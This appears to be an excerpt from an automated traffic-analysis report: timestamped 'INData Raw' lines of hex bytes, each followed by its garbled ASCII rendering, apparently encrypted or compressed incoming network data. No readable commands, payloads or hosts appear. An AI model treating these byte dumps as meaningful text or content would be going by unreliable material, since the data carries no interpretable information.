                                                                                                                                                            2022-09-29 12:44:59 UTC4917INData Raw: 29 1c c1 d3 56 fc 21 aa 5c e0 c8 a3 a0 41 6d d0 35 29 15 be 48 40 f5 83 e5 e7 07 36 00 c9 ea 8b 99 de 0f 93 b0 0e eb 63 dd 61 00 51 d6 67 b9 15 c6 ad 3e 8e b9 fc 7c 48 d3 37 3d 6a 40 86 81 90 d6 13 2a 56 38 d0 f3 f4 ba 97 e7 05 77 82 8f d4 76 b1 02 d4 fe 0a 60 ff d4 1b 63 89 e0 e0 54 32 4c e3 ae c0 02 ca d6 c0 11 ca 86 b8 67 bd ee 79 bf 46 41 87 7a e8 a3 7f f6 67 e9 eb 8d f7 a6 54 ad ef 04 56 72 79 5d 69 11 87 81 ce 1a de 4b 72 55 3b 46 7a 05 69 24 19 fe 37 e7 b0 fe f8 6b 9a 1a c4 78 07 89 a8 ee b8 e9 b0 d9 39 01 36 35 10 4c c6 6c c3 91 81 d4 75 19 7b 07 6c a7 2b b9 f5 76 df 42 4c 39 79 26 d7 8f 68 74 8e 2c 06 b1 b7 fa ec 22 a1 63 bf 79 2b 02 d6 a4 f6 bc f6 f9 8f 5b ef 73 dc be fe 83 b7 77 59 a1 2b d5 1f dc 6c 55 3c 01 a5 40 56 eb d1 d1 a3 e1 31 d5 1f b4
                                                                                                                                                            Data Ascii: )V!\Am5)H@6caQg>|H7=j@*V8wv`cT2LgyFAzgTVry]iKrU;Fzi$7kx965Llu{l+vBL9y&ht,"cy+[swY+lU<@V1
                                                                                                                                                            2022-09-29 12:44:59 UTC4933INData Raw: ce 69 8d 00 ba b8 e1 a6 16 cb fa ed 0d f5 5f 68 00 f3 b5 97 fe 61 a8 8e 37 95 ed ed 92 39 5d 2b da cd c9 92 86 ac 16 b4 b6 32 06 72 a7 d7 ee 9b c7 1c e0 dc 43 51 c4 fb 08 49 37 c3 47 e2 fc 38 ff 99 13 62 e4 0d 58 6e e3 cd e9 0e c0 63 b7 45 09 a6 55 86 ab 7d 2b d0 64 6f 4a d6 fe 11 49 73 50 b5 7b 8b 60 ac e5 f2 80 aa b1 2f 73 b4 91 13 dd c5 e0 4f 9b fb fd 3a 41 1b 92 fc 12 d1 90 04 1e 99 40 1d aa 67 7f 42 65 8f 28 e0 7a 09 f3 48 c5 c0 0b a2 9b 29 a0 1c 5c 31 5c 24 6b e9 a0 b7 c8 cf 9d 1e a3 80 fa 1c 99 c4 87 c6 59 b2 f8 31 a5 a7 0e 20 e6 5c 73 ba e4 62 f8 26 55 7b e5 69 28 be 9c 43 0e de 60 b3 a2 35 04 57 d0 9b 94 e2 6d 8a c9 dd 4f 15 de 4c 49 42 cd 7f 1d 67 0b bf 45 c4 2e 56 f0 46 d4 18 26 e4 c0 b9 2b 53 7d bb 16 5a 5d 02 be f8 82 6c 5f a2 a0 e6 3a f9 29
                                                                                                                                                            Data Ascii: i_ha79]+2rCQI7G8bXncEU}+doJIsP{`/sO:A@gBe(zH)\1\$kY1 \sb&U{i(C`5WmOLIBgE.VF&+S}Z]l_:)
                                                                                                                                                            2022-09-29 12:44:59 UTC4949INData Raw: 21 b3 39 8d 42 53 d9 52 48 74 eb 91 60 03 bd f7 61 bd 1e cb 0c 06 96 2b 6d f6 c7 c2 10 3c 2c 92 41 b6 3c f2 f9 90 d5 9c a2 5e 9a 6e 73 86 06 6c 01 e0 ae cd c5 ec 23 d2 14 d0 fc cb b1 8c d7 52 0b 39 3f bf 96 53 50 27 9a f7 fc 33 60 3e 0e 50 f5 35 4a 0d ca 5f 32 8d c6 06 e8 9d 72 22 17 9b 95 a9 00 01 9e 61 6c fd e8 c7 cb fa c1 b3 df 56 e0 70 79 0b 35 ea 3a 16 ce a7 bd 00 ec 75 d7 6e f8 6e 0d 96 f2 03 10 e0 54 df 1d ea 6a e4 47 43 15 8d 20 c8 0c 7d 91 4e 4f 8d 25 95 12 63 8a 8d 07 8c 37 11 19 e7 2e b8 2c ea 67 7e e6 bf c2 94 7f 4c 1b ba 9c a9 99 d2 f1 bf 49 7a 52 e3 75 e0 2c bb 5d f7 1f 24 9c 18 e8 cf 86 f4 f5 49 8c 86 f0 4a 28 fc 4b 37 1d 88 27 21 3e bc 71 70 a8 d1 64 a3 1d a2 d4 45 66 d9 6c 42 d1 16 ba 5d 5b 8f 67 18 ed 2a b9 b5 9b 5a 60 b2 0b 5f 4b ca a7
                                                                                                                                                            Data Ascii: !9BSRHt`a+m<,A<^nsl#R9?SP'3`>P5J_2r"alVpy5:unnTjGC }NO%c7.,g~LIzRu,]$IJ(K7'!>qpdEflB][g*Z`_K
                                                                                                                                                            2022-09-29 12:44:59 UTC4965INData Raw: e2 e3 55 ce 6d f5 37 f6 52 1c 88 fe 96 e5 78 28 cd 93 92 a0 ef c8 d1 64 db 20 b3 23 64 a2 4b fc 64 52 27 cb da 13 95 35 a6 03 dd 18 5f 87 72 04 26 fc e6 17 e1 6e 28 9d 26 10 4f 1a 68 0f dc 5e 86 92 92 76 63 3b 6a 6d 98 3d b6 34 62 4f f0 89 e3 70 42 d3 93 d3 ee 35 37 32 e5 0f 0f 97 17 d5 00 56 da 25 3c ad 54 a8 00 46 66 13 13 6d c4 4d cd 74 1c 01 42 e0 e9 69 78 8f 06 c8 08 a8 1f a1 92 b3 46 5c 9a b9 32 84 45 7b ba a1 85 51 b9 60 42 c5 a2 c4 70 eb c9 44 09 ec eb 58 01 70 0d 34 11 36 ba 1a 96 93 a6 58 f5 b1 eb 38 6a 46 46 97 4b 78 80 2a e7 b2 60 20 34 f3 c4 4e ae a3 51 84 62 b9 99 93 02 62 6d 0e 6b 10 9e 2b 02 d8 4b 9c 38 64 e4 91 95 92 b4 66 55 8f 42 66 be 01 83 1c 6b fc 8d 79 57 0d 4e c6 ed f8 d4 c6 c4 d7 a9 9e f8 7e 62 37 f2 43 dd 33 43 6d 60 0e 7a bb 43
                                                                                                                                                            Data Ascii: Um7Rx(d #dKdR'5_r&n(&Oh^vc;jm=4bOpB572V%<TFfmMtBixF\2E{Q`BpDXp46X8jFFKx*` 4NQbbmk+K8dfUBfkyWN~b7C3Cm`zC
                                                                                                                                                            2022-09-29 12:44:59 UTC4981INData Raw: 29 00 fe 78 2c c3 2d a0 06 ab b6 37 40 dc 15 7d ea f7 47 f2 38 0e 9e 17 ea e9 a8 e2 b4 09 90 bb 37 03 6e 3f 15 f5 1c 54 a3 67 6e 2e 26 a0 cf 0e 63 7a ce 89 61 a1 62 a9 32 2d 1d f5 ae ad 86 a2 a3 cd 2f 00 90 26 f9 12 1e ff eb b7 86 ff d8 0e 44 d2 ad ae e6 07 91 db 96 47 de 5c f0 dd 02 7f b5 b1 19 e2 80 68 4f bf d1 7f 36 e3 3e be 68 50 04 c1 02 f2 43 f7 c2 72 4d 89 e1 b3 da 4a 11 07 9c 23 16 02 0b 51 4a 51 9a 64 bc 05 05 9d 52 0b b3 11 1f 3d 91 e2 84 59 47 b4 41 d7 de 2f c9 10 ee be af 9a 9f 6f 2b 77 9d 16 17 7c 1a 9d 2d e2 d8 98 ce 9a 77 4c 01 e3 30 06 5f 8c d2 46 fb 13 f8 62 e7 cd b1 e4 ea e8 d0 e6 22 8f ab 8e 6f 86 01 43 25 ec c5 b3 3e 69 8b c7 7e aa 36 ae be 32 2b c8 8b 36 b0 fd f0 2a 86 8a 71 3a 6f a2 55 17 b9 38 83 33 32 1e e6 a0 f4 4f 9e 21 d7 d5 c9
                                                                                                                                                            Data Ascii: )x,-7@}G87n?Tgn.&czab2-/&DG\hO6>hPCrMJ#QJQdR=YGA/o+w|-wL0_Fb"oC%>i~62+6*q:oU832O!
                                                                                                                                                            2022-09-29 12:44:59 UTC4997INData Raw: 8b ae 56 c3 02 12 11 ef 9b b3 3c 26 fd 93 47 8a 28 8c b3 c0 79 81 71 81 86 7f 98 a8 e2 6b dd bf 25 85 01 80 ce e6 cf 21 bf 77 d5 04 24 b9 f5 6c 3c e7 f5 b1 7d b1 07 4f de 02 78 1b be a4 35 37 7c 74 94 14 20 c7 4d 4a a7 c7 85 a1 12 76 3c e2 47 e4 a7 e3 cf a4 0a 04 ea 67 ff 7c e3 44 5f d4 cc 52 7e a8 b3 bf 16 af b8 13 08 3f ca 68 45 16 36 a0 ea db 03 04 a7 ab 66 25 be ff 49 c6 71 23 49 96 e8 fc 17 a6 29 6b 58 b2 d7 0e a7 8c 2d ea d5 f9 8e 9a 19 58 6b a3 63 fa 20 c7 b2 ef e3 fc 32 49 8f 39 0c 63 fd 75 ff 7f 25 00 ea a9 50 a9 ea d9 a2 42 31 88 30 a6 0d dd 8a 04 0c 67 b6 b3 97 59 21 d5 c1 60 37 ab 7b 60 22 d5 52 4d 92 a6 c3 8e c7 8d 17 f9 8c 29 7d aa 50 7d 4e 16 86 0b 71 af 4d 6b 36 8d f3 a4 5b 5f cf 60 2b 39 cd 2f 5b 28 18 7b 01 05 53 39 d5 48 9b 78 9a de 0c
                                                                                                                                                            Data Ascii: V<&G(yqk%!w$l<}Ox57|t MJv<Gg|D_R~?hE6f%Iq#I)kX-Xkc 2I9cu%PB10gY!`7{`"RM)}P}NqMk6[_`+9/[({S9Hx
                                                                                                                                                            2022-09-29 12:44:59 UTC5013INData Raw: b6 ad b5 de d7 a1 ef 43 e3 75 df 36 22 ce 39 fb da 22 2d e4 2b 88 02 28 80 08 13 b3 3e 2e 8f cd b9 ed 51 d5 d5 e7 59 ca 05 cd e0 b0 63 0e 60 2f a8 d8 00 0c 53 dc fa 61 cc 50 4c f2 72 60 79 8b 9c 50 81 2e 2f 88 4b c2 90 7e 24 d4 ed 74 b3 d8 3c 7e c4 63 83 93 55 4b af b1 5b 68 ad 60 54 27 cf 18 c1 2d e4 75 8d 4a 0c a2 3f 1c 76 f2 f5 8f 01 29 46 16 76 9b 46 f2 2a 36 36 24 68 c7 75 10 49 a6 59 49 89 b0 42 90 a7 eb be 36 1c f6 f3 d1 5d 03 7c 84 0e 3f 40 97 e9 8d 41 5c 2d 5e fd 62 ac 10 07 f7 dc bb e8 3b 7d ae 6d ec 2a f8 38 aa 6b 9d b8 80 12 a5 49 6d aa 59 54 17 b7 fa c6 12 ce 6d 52 28 6a fd c5 bc f9 93 33 a4 e0 0a 03 ec 29 a4 57 4f 39 f0 6a c8 6d 6c 64 ab 40 cd 6c ec 8d 30 95 14 8a 66 96 af 24 11 bb 93 da a5 1a eb b4 87 7d 43 63 be 9d 27 f1 4e 3e c0 3a 62 14
                                                                                                                                                            Data Ascii: Cu6"9"-+(>.QYc`/SaPLr`yP./K~$t<~cUK[h`T'-uJ?v)FvF*66$huIYIB6]|?@A\-^b;}m*8kImYTmR(j3)WO9jmld@l0f$}Cc'N>:b
                                                                                                                                                            2022-09-29 12:44:59 UTC5029INData Raw: ec ac fa ac 2d bf 62 8e a0 84 51 ca a7 e1 79 c0 f0 4d aa bb 38 4a 17 28 11 76 95 c6 bd d4 37 9d a4 ed 57 df 50 35 45 f3 16 fa 9e 1d 85 bc de 85 05 0b fd 0f 82 d3 24 e8 10 6c 28 02 a5 5f 64 4f d9 47 85 6a 2c 92 e4 eb 77 2f 22 91 f5 44 10 67 57 ab ca 8b 51 07 f2 6f c7 5d 8c 63 81 f2 72 df 65 6f fb 3a 16 7f 6a f2 8d 54 a1 2c a2 7a cf be a4 79 63 fa 93 fa dd 3c a7 c0 c6 e3 09 66 5e 0a fe d1 37 79 dc 1d 16 d6 92 47 7c 0a 60 30 dc ae ba a4 d8 63 2c 8f e3 71 79 60 a7 26 fa 1a f6 64 d1 3f 0c 59 7a 4b 70 65 0c e4 0f 10 e9 e3 20 c9 f3 27 6a ed ab 42 49 31 9b a2 af bd 2b 4c 7e dd 26 28 5d 23 dc 3c 44 60 e0 d7 08 c2 35 28 61 2d 1a c2 f7 ff e8 0f 02 90 a8 e2 34 8b 36 34 a3 4a 98 3d 88 73 da f6 da 24 fe 66 49 2d b3 ed ab 91 ac 14 3c 71 91 7c 65 cd d1 5d 6d a2 db 3c 56
                                                                                                                                                            Data Ascii: -bQyM8J(v7WP5E$l(_dOGj,w/"DgWQo]creo:jT,zyc<f^7yG|`0c,qy`&d?YzKpe 'jBI1+L~&(]#<D`5(a-464J=s$fI-<q|e]m<V
                                                                                                                                                            2022-09-29 12:44:59 UTC5045INData Raw: 5e e7 e2 b2 6a bc 1f 3f c6 90 08 2f 9e 27 11 26 55 77 ee 30 38 43 96 ff 46 e3 e5 5d b9 93 65 e9 86 f8 02 75 cd 58 de 1e 9c fa a1 14 e5 6c af 77 00 cf 32 83 ce 34 d8 b5 0e 77 17 52 de e9 f5 a3 9e ec 38 91 dc bb 0d e6 47 97 83 67 35 be 1f 67 b4 e2 d4 09 8d e4 0c c0 af 09 82 6c 57 af e1 bb 6c e2 79 e5 6a 78 0d bd 3a 3b 03 7e f8 d3 a7 fa 94 f8 e7 70 88 fa 22 10 ea 6b b4 a1 37 70 b0 92 53 66 8c 99 b3 81 26 df 6a ad 90 ff 96 61 79 c2 2a 8f 99 92 0a 77 2f 25 0f b6 78 08 ec b4 da 9e f2 2a 9d 69 7a 27 07 c7 96 dd 1d 92 92 ac 88 3d 47 d7 12 de fc 4c 88 9d dc c5 3d 99 34 7f 15 46 20 52 cd 29 f0 df 96 2b b2 bd 33 a8 f7 b8 9d 30 b5 5d d2 0a 1a a0 31 7f d7 2b 79 09 7b a0 6c 98 0d d5 88 42 9e ae 6b 80 0b 0e 50 8c 89 76 7f 43 b9 58 e5 2f fe 0a 13 70 9b ce 95 17 44 a4 81
                                                                                                                                                            Data Ascii: ^j?/'&Uw08CF]euXlw24wR8Gg5glWlyjx:;~p"k7pSf&jay*w/%x*iz'=GL=4F R)+30]1+y{lBkPvCX/pD
                                                                                                                                                            2022-09-29 12:44:59 UTC5061INData Raw: 79 11 e1 f8 e9 46 d0 bf 03 8b ac 70 ea 88 b1 dc f2 80 d4 96 e9 72 01 d6 e0 e8 52 32 bf 60 39 0d 26 9e b8 18 e8 ac 6f 13 f6 9a 6c a2 08 00 62 3e 17 d2 ec 91 4b 1a da 59 4b a9 d7 b0 82 97 8c 99 a7 90 33 e8 be 81 d0 93 f0 27 3d 96 e8 af d7 44 26 48 ca fd 59 8e 44 95 d7 31 6d 43 67 e4 ed b4 b6 7d dc 6a a8 c3 98 18 d5 32 50 34 48 d8 38 cb 63 b5 99 57 4c 9b 7e ab 14 1f 2d e8 05 74 17 59 de e5 9f 04 84 42 ff 89 a8 ad bd 7c 8f 64 db a6 50 b2 80 c2 d1 0b dd 90 52 84 61 03 b6 52 e0 b6 0d 6a 95 2d 15 16 6e 76 16 2b 39 4c 7e 2e 85 b6 2a 8a 5b 95 91 b5 d7 d8 75 c7 46 32 8a c2 9e 36 f3 72 89 db f5 2f bc 88 e1 30 af 0c d1 96 99 c8 7a 65 50 f2 71 fa 11 5d 48 be da 79 cf e5 14 97 7d d1 ea 54 eb c3 a5 b5 df d2 d8 2c 71 c5 57 48 59 81 44 f0 33 5d c9 df 05 27 98 25 bb 5d b2
                                                                                                                                                            Data Ascii: yFprR2`9&olb>KYK3'=D&HYD1mCg}j2P4H8cWL~-tYB|dPRaRj-nv+9L~.*[uF26r/0zePq]Hy}T,qWHYD3]'%]
                                                                                                                                                            2022-09-29 12:44:59 UTC5077INData Raw: 2d 81 b4 2e 63 50 d7 36 8d 58 9b a5 45 0c 0a 4d c7 77 f9 f7 2e 0d 19 5a 4e 3d 3d cf 63 ca 1f ad 5d fe 60 75 3d 87 91 da 28 2a af e8 5f 14 a4 72 75 11 41 8a e6 1e 88 a6 9b ce f6 9f a4 9c f8 57 bf b5 89 25 f7 ec a4 f8 4e 35 f4 0f 85 8d a7 61 71 79 84 c3 fa 90 37 99 71 c2 eb d9 e5 f2 10 b3 d7 0b 50 24 72 d3 cb 9a fc 6d c6 a7 81 b1 57 b1 6b 84 dd 72 20 88 be 6b 31 b3 c0 87 71 dd 02 06 ea bd 64 fc df 17 1c e1 b4 f5 f2 81 35 f5 2e 24 83 47 b1 cb b1 c3 1a ab 2f d6 ae 3d 24 81 b2 7a 70 bb d6 f8 ca a2 94 d8 eb 1e cf 1a 29 cc 1f e0 92 ab df 98 12 a5 25 ad f5 22 05 3e a9 4f 01 be 1c 48 eb 43 d5 0b 98 a2 f6 86 aa fc a3 31 75 28 ac b2 c7 91 ea 68 88 23 c5 20 81 ad 23 71 06 ad d6 34 52 34 fa a2 58 96 de fe 3f 4f 57 5a 37 80 0c e7 6f c1 77 01 e7 58 5d 7e 16 5a 52 ba 6a
                                                                                                                                                            Data Ascii: -.cP6XEMw.ZN==c]`u=(*_ruAW%N5aqy7qP$rmWkr k1qd5.$G/=$zp)%">OHC1u(h# #q4R4X?OWZ7owX]~ZRj
                                                                                                                                                            2022-09-29 12:44:59 UTC5088INData Raw: fa 65 3a a5 e5 31 05 7f cf 71 c4 fa dc cf 23 1b 3c 97 f5 ca f6 aa 15 b8 23 de 6b 80 01 6f 21 d5 61 70 93 18 7a 38 9b b6 9b e9 dd a2 8b 88 84 f0 b5 e6 e6 55 d1 8d 09 8a f3 74 1e d5 f5 49 b3 f6 6d 25 b3 23 e0 af 12 13 5f c4 36 d3 d5 3c 16 86 bc 5e 8d 6c 79 6f 51 8c 2a 03 a3 e8 e1 f7 e5 48 0c 12 47 f0 7e 8d 59 3d 18 09 d9 8f bf 69 99 e7 2c 0b 16 09 31 53 69 a9 b6 51 5e 88 fe c6 67 c7 11 45 88 0d 32 81 54 36 b8 31 28 35 ed ee 1b 36 73 1e 1a 36 b9 33 38 fd 71 a6 9a 43 f5 ef 1b 2c 45 ee 8b 1f 54 51 d0 82 0d ab b9 bc dd e0 a0 9c 9c 59 21 d4 87 94 b7 5e 5b c6 41 43 ac d4 f0 31 d8 1d 60 c2 62 97 ac 61 a7 a2 3a e7 b4 c4 ed 18 45 30 88 25 41 47 b6 5a 48 2d a6 d1 a4 6d b4 c7 3a 9e 1f 39 2e 6c 6a 68 d2 6c 1e f0 10 17 f1 ef 3f 9c b7 b7 c9 71 79 7d 05 b5 42 72 43 0f 23
                                                                                                                                                            Data Ascii: e:1q#<#ko!apz8UtIm%#_6<^lyoQ*HG~Y=i,1SiQ^gE2T61(56s638qC,ETQY!^[AC1`ba:E0%AGZH-m:9.ljhl?qy}BrC#
                                                                                                                                                            2022-09-29 12:44:59 UTC5104INData Raw: 24 74 67 e6 a8 42 01 d4 f6 e3 e4 4d 74 2b 97 b4 a1 c0 d0 b4 18 7c 5d 66 b3 26 be 49 c2 37 71 3a 8b 99 4f 0f 2f 62 85 44 57 c7 12 12 ac 54 c3 ac ff c2 b5 8a 06 3e 8b f6 f9 8b be 31 df 1b 0b 6a 44 c7 df 31 8d a9 8c 54 b8 ac 40 ce 38 74 c6 5f 3b a1 ab d6 ba ca 34 7e 03 9a fd 1f 63 44 f7 03 f0 24 9b 1f f2 e2 f0 b3 85 8d 33 88 3d dd 0d 80 4e 28 19 13 86 fa 81 87 84 45 c2 a9 7f 7e da 68 6e 31 32 ef a9 e9 5c 3d ac 6a 9d 74 cf d7 88 d5 95 59 4c d5 16 25 47 13 20 53 b7 96 d8 b5 b0 45 88 71 cc 8a 63 6b f4 b3 27 ea b3 d6 6c 43 68 91 9e 31 64 8d 3d 36 2d 41 8f e7 f8 13 fc cd 3d 2f de a1 19 88 ea 67 bd b4 54 23 65 97 67 76 74 ea c3 aa 3b bc eb d7 70 fe 35 0f 67 a0 78 31 c4 f1 26 4c 56 fb 57 ca 7c 43 2e 1f cc 69 c8 4d a8 98 f7 24 0e 3c d4 61 95 0f 2e 15 1c ce f2 13 a5
                                                                                                                                                            Data Ascii: $tgBMt+|]f&I7q:O/bDWT>1jD1T@8t_;4~cD$3=N(E~hn12\=jtYL%G SEqck'lCh1d=6-A=/gT#egvt;p5gx1&LVW|C.iM$<a.
                                                                                                                                                            2022-09-29 12:44:59 UTC5120INData Raw: 21 c6 c8 ac e0 9a a4 60 e6 eb 91 9e 7b 5f a4 8a 3e cf a8 46 be 34 b5 83 af b8 9b ca 28 c4 13 0b 2a f4 9a a7 6d c9 6a e2 63 1b 18 8f 25 d5 82 6e 21 c4 8d c8 66 21 f4 66 54 7d 80 09 35 83 99 4e b4 13 8a bd 43 a0 b3 2a 96 af c5 d8 b9 c0 59 53 dd b9 88 4f 15 b0 ca 7c de d7 97 64 c4 71 28 82 ce 5a 1d 95 5a 6c e5 42 9e c2 5a b5 7f 2f 47 1c 36 33 9e e9 2f 55 c3 e5 bf 77 99 72 d0 b6 b4 b7 71 17 95 2c a3 c5 56 db 08 60 89 3e 97 02 4f d2 68 a1 11 bd af 91 00 29 ea 41 f2 02 49 ea 63 e6 b7 ed 0e 46 cd 5b f0 be 47 e4 cd c7 76 fb d1 86 83 64 fa 93 7c 83 0a b0 25 7e 9e da dc 1b 6e df 44 e0 29 2f 0d a8 24 d9 20 69 60 57 ab 7d d5 f7 a9 be 3d 71 88 d2 18 ea d7 e7 bc 70 6f 6f c5 25 26 3c 7e be 87 e3 9d d4 be a3 20 55 28 23 ed 4c b5 25 b2 ec 49 29 6c 1a e2 d6 05 d3 2a c3 2f
                                                                                                                                                            Data Ascii: !`{_>F4(*mjc%n!f!fT}5NC*YSO|dq(ZZlBZ/G63/Uwrq,V`>Oh)AIcF[Gvd|%~nD)/$ i`W}=qpoo%&<~ U(#L%I)l*/
                                                                                                                                                            2022-09-29 12:44:59 UTC5136INData Raw: 01 10 90 78 f5 fd 2b 2e a7 e6 a7 b2 89 c8 bf 9f 58 87 eb 4b 4c 1b a1 29 66 52 08 48 7d 90 12 d2 b7 ab 70 51 2c f6 46 d7 e8 3b 7b fe 20 14 ef fb ae 6b 8c bd d1 e6 00 0c d4 83 42 d9 c6 ef a5 bb 48 b7 c2 b0 88 af 85 de 9f 19 cf be 00 1f 81 40 43 db 3c 76 aa 19 b7 9e 93 78 6b c8 32 f9 84 0a 60 15 4f 7c 66 f7 08 cb 4f 90 37 3d 4d a7 4f 83 1d ac a6 a9 71 76 95 f4 93 05 cb 99 5c 6f e9 7d b6 68 03 80 ba 86 b8 7b ad 50 3e da 05 37 48 4b 6d 79 84 5f 7e c3 07 03 41 1c 5a 47 3e 6c 62 d0 c9 d4 d0 cf d0 34 d1 50 66 38 c7 32 e8 51 64 c0 fb 27 44 b4 04 58 ef 58 87 84 35 42 d3 1e 39 bd c1 78 47 f8 04 60 a5 5e 4a 94 14 c7 52 78 07 90 65 10 f7 4a 7f 1c b4 d5 08 d8 fa 73 50 2b 34 5a ba 20 39 a4 a1 be c4 1b d3 c7 46 aa 6a 6b f9 07 7b 5c 0e d8 4d 01 80 4f d3 50 97 64 85 85 0e
                                                                                                                                                            Data Ascii: x+.XKL)fRH}pQ,F;{ kBH@C<vxk2`O|fO7=MOqv\o}h{P>7HKmy_~AZG>lb4Pf82Qd'DXX5B9xG`^JRxeJsP+4Z 9Fjk{\MOPd
                                                                                                                                                            2022-09-29 12:44:59 UTC5152INData Raw: 5d 0f da da 84 48 bd 62 02 05 61 c0 95 47 34 74 51 e8 24 53 b7 20 b6 01 a3 f8 d7 c8 6f 57 99 be 6c cd 37 70 18 b8 ca a3 33 20 26 66 7a 6e 6a d9 80 32 ee b1 3c af 6a ac 87 f9 7b f6 9c d2 d1 fe b6 3e 8e 90 d6 09 1c 69 59 4f b0 70 7b 7f 36 91 cc f7 06 ad 2e 81 da dd 11 3c d3 82 a2 5a 3e 3a f6 c4 df 0b f7 81 ea 7d 42 42 1f 8e 34 f9 16 6b 8f 23 9f 61 9a 78 9f 79 e3 75 36 31 9b 77 4f 3d 0f ee d0 91 31 25 a3 92 6a 83 74 91 69 fb 0d b0 f1 51 11 90 2b 69 28 d3 45 6a 6d 4a 26 17 12 65 c5 e1 c7 9d 2f cd b6 d4 de 81 0f 85 35 47 95 cb 43 2e f5 f7 30 05 09 7d 9c 6d 6a 90 5e f3 a4 2f e1 27 81 0e 8b e7 c6 44 c3 6c d2 02 22 e2 3e cb c5 f8 dc fc e1 b0 0d fd bc eb 09 de b7 48 ad 7b 3b e9 5c 9d 7c 95 75 0f 5d 74 ef ca ed 95 a2 d9 1d 07 27 96 6d b0 52 20 25 cb 9f c9 05 cd b5
                                                                                                                                                            Data Ascii: ]HbaG4tQ$S oWl7p3 &fznj2<j{>iYOp{6.<Z>:}BB4k#axyu61wO=1%jtiQ+i(EjmJ&e/5GC.0}mj^/'Dl">H{;\|u]t'mR %
                                                                                                                                                            2022-09-29 12:44:59 UTC5168INData Raw: 9e 61 4f 00 85 99 93 61 f7 f6 fe e2 a0 4d 90 9d 7b 7f 31 47 b9 12 db f9 f4 e5 dc e6 3a eb e2 e3 9f ea 48 ce 81 c9 e2 4c cc be 7a 3a 0a 10 c7 12 a1 12 fc 19 d3 0b c3 b7 c8 b2 1f 38 c6 5b 94 cc 68 34 b8 d8 6d aa ed 91 16 1e bc 57 a4 0b 05 35 11 83 64 4a e7 a8 64 19 8b 49 b7 d6 ba c2 2b 6c 0f 39 83 13 16 c6 7e 75 ea 48 0e 65 51 03 17 49 81 8f ac c3 db c0 87 40 dc 11 6b e5 22 b2 c7 3a 9c 8e f5 89 e0 15 1c 7d bd d4 cb 88 4e b4 79 72 76 77 a2 7e 1b 17 5c 66 fd 68 a4 55 5c 75 0a 6a 55 26 1a ec 71 17 4f b5 02 bf 54 b1 22 e1 c8 9b a8 fe 6c f0 2e e1 c3 87 09 d5 0e 27 a8 ff 74 8e 8b 7c d3 35 5f ff ba 29 12 98 b0 61 80 20 ec ef b5 7d 40 ca eb b8 6c 8c 4d af 38 ee ed de 96 89 3c a7 a0 1e 0d 09 ce 5f dc 23 66 a3 b5 51 8a 2f 60 4c 1c 01 a9 23 e7 8c fa 81 0f e2 80 bf 0e
                                                                                                                                                            Data Ascii: aOaM{1G:HLz:8[h4mW5dJdI+l9~uHeQI@k":}Nyrvw~\fhU\ujU&qOT"l.'t|5_)a }@lM8<_#fQ/`L#
                                                                                                                                                            2022-09-29 12:44:59 UTC5184INData Raw: 66 37 ab 2a df 2c cb 30 39 bb 21 aa c8 94 5b c8 3e 58 ba 5c 0f 7d 1c 2f bd fd 5c 4e bf 63 5a 4d 7d aa 78 6c ea 54 2a 6d 4a 28 ca 6c cf 97 01 ae c9 eb 72 4f 39 54 f8 01 e3 f6 1b ba 09 74 aa 0b 5a 91 b2 86 f2 aa 77 9f 47 13 4d 12 a0 a8 31 9e bc 80 99 35 1d 48 79 1d 05 f3 85 bc a8 15 37 04 db c7 09 62 ad 88 c8 77 8d 06 98 9c 48 05 a6 5c ee 35 b6 57 8e ad 85 a4 07 80 da 01 c5 67 57 96 7f 0d ca 60 8d 33 bb 86 6c c1 85 eb 94 06 45 9b 69 c7 f6 93 3f 20 0a f8 c6 77 c7 c9 fc 1b a7 62 51 0a c1 af 44 e8 74 14 f8 a1 15 af 19 f6 82 97 5c f3 d4 00 54 44 1c 83 f2 d9 2d 99 f7 74 63 ce 88 1f 2b fe dd 4d 51 c9 68 8e d3 fb 2f d8 d4 33 3e 21 5c a4 f6 48 27 f3 ae 1f 4a 06 e8 3c 37 c2 e6 4a 49 45 33 e2 a4 19 ed b0 d7 84 53 64 c7 38 0f 51 90 13 00 ad b6 72 6d 90 b3 c8 a5 81 94
                                                                                                                                                            Data Ascii: f7*,09![>X\}/\NcZM}xlT*mJ(lrO9TtZwGM15Hy7bwH\5WgW`3lEi? wbQDt\TD-tc+MQh/3>!\H'J<7JIE3Sd8Qrm
                                                                                                                                                            2022-09-29 12:44:59 UTC5200INData Raw: 96 e7 61 a2 6b 05 d0 90 f0 ce fa a1 4b ec ab e0 80 74 26 87 52 eb 1f be 87 75 f6 e1 d9 65 7a 4b 7d ea ab dc 3f 28 c8 fd e5 9b a3 84 20 e4 8d 48 cb 16 81 4b ed 9f e9 2e 6e 41 c4 d4 6a 80 35 05 bc 5c 28 6a 7c 0f 91 5f 74 4c 70 92 b2 a0 5d 26 2d 4a 13 c9 0c 53 44 2f c6 92 99 d9 0f b3 ae 14 c4 ca 58 3f e1 65 16 3c c3 33 7c 85 00 3c e4 a2 cb 91 32 e6 12 63 f2 3c 48 b4 fd 3e 71 42 65 54 81 39 76 42 5f af 9f bd 87 81 81 69 4a 61 73 a3 e9 c0 8c 5b 6e 67 f2 28 35 73 7d bf 08 09 58 53 5b 93 75 6c b2 8b ba fc 00 f1 6d a1 4f 6e 8e b1 08 9e cb 85 c7 48 a4 a9 f5 62 84 7a 81 31 f0 1e 30 0a 48 78 36 ba ad 81 40 5b 28 b2 97 da 77 13 c5 c0 22 15 51 b6 49 0d be 0d ed dc 71 a0 65 3a f2 31 f2 7d 18 80 81 59 26 76 60 79 d6 0c 4e cd e6 50 6b 0c 32 91 1e f6 28 99 d9 63 2c 37 42
                                                                                                                                                            Data Ascii: akKt&RuezK}?( HK.nAj5\(j|_tLp]&-JSD/X?e<3|<2c<H>qBeT9vB_iJas[ng(5s}XS[ulmOnHbz10Hx6@[(w"QIqe:1}Y&v`yNPk2(c,7B
